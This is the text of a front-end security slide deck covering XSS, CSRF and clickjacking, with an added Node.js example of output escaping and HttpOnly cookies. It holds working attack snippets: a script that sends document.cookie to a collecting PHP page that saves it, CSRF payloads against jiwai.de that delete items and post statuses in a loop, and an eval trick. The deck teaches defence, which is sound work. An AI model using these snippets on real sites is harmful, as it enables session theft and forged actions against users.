F2e security
jay li
9.
Cross-site scripting
XSS
10.
XSS
11.
• Cookie
• DOM
• …
12.
Yupoo
XSS
14.
alert
15.
Javascript
// demo from the deck: reads document.cookie and sends it to the collecting script
var img = new Image();
img.src = 'get_cookie.php?var=' + encodeURI(document.cookie);

PHP
<?php
// receiving side of the same demo: writes each received value to a file
if (isset($_GET['var'])) {
    file_put_contents('./cookie/' . time() . '.txt', urldecode($_GET['var']));
}
19.
• Filter input, escape output
• Cookie
• noscript?
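The slide names two mitigations without showing them: escape untrusted values on output, and keep the session cookie out of script's reach. The following is an added example, not code from the deck: a small Node.js demonstration of both. escapeHtml, renderComment, buildSetCookie and the sample payload are constructed for this demo and are not the deck author's code.

```javascript
// Added example (not from the deck): the "escape output" and "Cookie"
// mitigations from the slide, in Node.js with no dependencies. renderComment,
// buildSetCookie and SAMPLE_PAYLOAD are constructed for this demo.

// Characters that change meaning in HTML text and attribute values.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Apply to every untrusted value at the point it is written into markup.
// In the browser, element.textContent avoids the problem entirely.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Server-side template for a user comment; both fields come from users.
function renderComment(author, text) {
  return `<p><b>${escapeHtml(author)}</b>: ${escapeHtml(text)}</p>`;
}

// Session cookie with HttpOnly (not visible through document.cookie, so a
// script that does get injected cannot read it), Secure and SameSite.
function buildSetCookie(name, value, { maxAge = 3600, sameSite = 'Lax' } = {}) {
  if (!/^[A-Za-z0-9_-]+$/.test(name)) throw new Error('invalid cookie name');
  // whitespace, ';' or ',' in the value would break the header itself
  if (/[\s;,"\\]/.test(value)) throw new Error('invalid cookie value');
  return [
    `${name}=${value}`,
    `Max-Age=${maxAge}`,
    'Path=/',
    'HttpOnly',
    'Secure',
    `SameSite=${sameSite}`,
  ].join('; ');
}

// Constructed input of the kind slide 15 relies on: a tag that would run
// script if written raw into the page. After escaping it is inert text.
const SAMPLE_PAYLOAD = '<img src=x onerror="alert(1)">';

function demoEscaping() {
  return {
    rendered: renderComment('guest', SAMPLE_PAYLOAD),
    cookie: buildSetCookie('sid', 'c0ffee'),
  };
}
```

escapeHtml covers HTML text and quoted attribute values only; a value placed inside a URL, a script block or a CSS rule needs the encoding for that context, and a value used as a whole URL should also be checked for a permitted scheme.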
23.
• http://en.wikipedia.org/wiki/Cross-site_scripting
• http://www.gracecode.com/archives/2517
• http://www.gracecode.com/archives/2491
• http://ha.ckers.org/xss.html
• http://www.xssed.com/
25.
CSRF: Cross Site Request Forgery
27.
<img src="http://.../del.php?id=64" />
32.
<form action="http://jiwai.de/wo/status/update" method="post">
    <textarea name="jw_status"></textarea>
    <input type="submit" />
</form>
33.
• GET, POST
34.
setInterval(function() {
    var img = new Image();
    var message = ' ';
    var api = 'http://jiwai.de/wo/status/update';
    img.src = api + '?jw_status=' + message + '&t=' + +new Date();
}, 1000);
41.
• GET, POST, Cookie
• Referer
• Token
42.
• _tb_token_
• Referer
43.
• http://en.wikipedia.org/wiki/Cross-site_request_forgery
• http://www.cgisecurity.com/csrf-faq.html
• http://www.80sec.com/csrf-securit.html
• http://www.playhack.net/view.php?id=31
46.
Twitter
Clickjacking
47.
1. iframe Twitter 0
2. “ ”
3. Twitter
53.
CSRF
55.
Cookie Session
56.
• “JS ”
58.
Q&A
60.
'alert(/tHx/)'.replace(/.+/, eval);